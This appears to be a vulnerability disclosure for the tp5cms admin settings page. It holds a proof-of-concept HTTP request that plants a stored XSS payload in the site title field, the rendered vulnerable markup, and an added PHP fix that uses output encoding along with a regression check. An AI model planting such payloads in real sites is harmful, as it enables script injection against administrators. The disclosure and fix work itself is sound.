An XSS vulnerability exists in the system setting position

poc:
```http
POST /tp5cms-master/admin.php/system/set.html HTTP/1.1
Host: 192.168.43.15
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.43.15/tp5cms-master/admin.php/system/set.html
Cookie: PHPSESSID=bpgp1b6kfpl84tdk4lj4mj4q16
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------1161322754603
Content-Length: 393

-----------------------------1161322754603
Content-Disposition: form-data; name="title"

"><img src=xss onerror=alert(1)>
-----------------------------1161322754603
Content-Disposition: form-data; name="keywords"

test
-----------------------------1161322754603
Content-Disposition: form-data; name="description"

test
-----------------------------1161322754603--
```
location:
```html
<form action="/tp5cms-master/admin.php/system/set.html" method="post" id="myform" name="myform" enctype="multipart/form-data">
  <table class="insert-tab" width="100%">
    <tbody>
      <tr>
        <th>网站标题:</th>
        <td>
          <input class="common-text" id="title" name="title" style=" width:800px;" value=""><img src=xss onerror=alert(1)>" type="text">
        </td>
      </tr>
      <tr>
        <th>网站关键词:</th>
        <td>
          <input class="common-text" id="keywords" name="keywords" style=" width:800px;" value="test" type="text">
```
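The markup under "location:" shows the submitted title landing unencoded inside `value="..."`. The PHP below is an added example, not code from tp5cms or from the reporter: it contrasts that raw output with attribute-context encoding and parses both results to show what a browser would build. The function names are hypothetical; the field name and markup follow the form in the report.

```php
<?php
// Added example, not tp5cms code. Function names are hypothetical.

// Before: the stored title is concatenated raw into a double-quoted attribute,
// so a value containing `"` and `>` closes the attribute and then the tag.
function renderTitleInputRaw(string $title): string
{
    return '<input class="common-text" id="title" name="title" value="'
        . $title . '" type="text">';
}

// After: encode for the HTML attribute context at output time.
// ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8
// sequences instead of making htmlspecialchars() return an empty string.
function renderTitleInput(string $title): string
{
    $safe = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input class="common-text" id="title" name="title" value="'
        . $safe . '" type="text">';
}

// Regression check: parse the fragment and report how many <img> elements
// exist and what value the <input> ends up holding after entity decoding.
function inspectFragment(string $html): array
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // fragments are not full documents
    $doc->loadHTML(
        '<meta http-equiv="Content-Type" content="text/html; charset=utf-8">' . $html
    );
    $input = $doc->getElementsByTagName('input')->item(0);
    return [
        'img_elements' => $doc->getElementsByTagName('img')->length,
        'input_value'  => $input ? $input->getAttribute('value') : null,
    ];
}

// The title value taken from the request in the report.
$title = '"><img src=xss onerror=alert(1)>';

$raw   = inspectFragment(renderTitleInputRaw($title));
$fixed = inspectFragment(renderTitleInput($title));

echo 'raw:   ', json_encode($raw), PHP_EOL;
echo 'fixed: ', json_encode($fixed), PHP_EOL;
echo 'value round-trips: ', var_export($fixed['input_value'] === $title, true), PHP_EOL;
```

The check needs PHP's DOM extension. Encoding at output time keeps the stored title unchanged, so the administrator still sees exactly what was typed in the field.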